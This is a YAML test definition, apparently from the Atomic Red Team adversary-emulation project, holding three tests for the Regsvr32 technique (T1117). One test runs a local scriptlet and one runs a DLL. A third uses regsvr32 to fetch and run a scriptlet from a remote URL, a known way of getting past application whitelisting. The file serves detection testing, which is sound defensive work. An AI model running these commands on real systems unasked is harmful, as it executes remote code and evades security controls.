Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
---
|
|
attack_technique: T1117
|
|
display_name: Regsvr32
|
|
atomic_tests:
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
filename:
|
|
description: Name of the local file, include path.
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
regsvr32.exe /s /u /i:#{filename} scrobj.dll
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
url:
|
|
description: URL to hosted sct file
|
|
type: Url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
- name: Regsvr32 local DLL execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_name:
|
|
description: Name of DLL to Execute, DLL Should export DllRegisterServer
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
|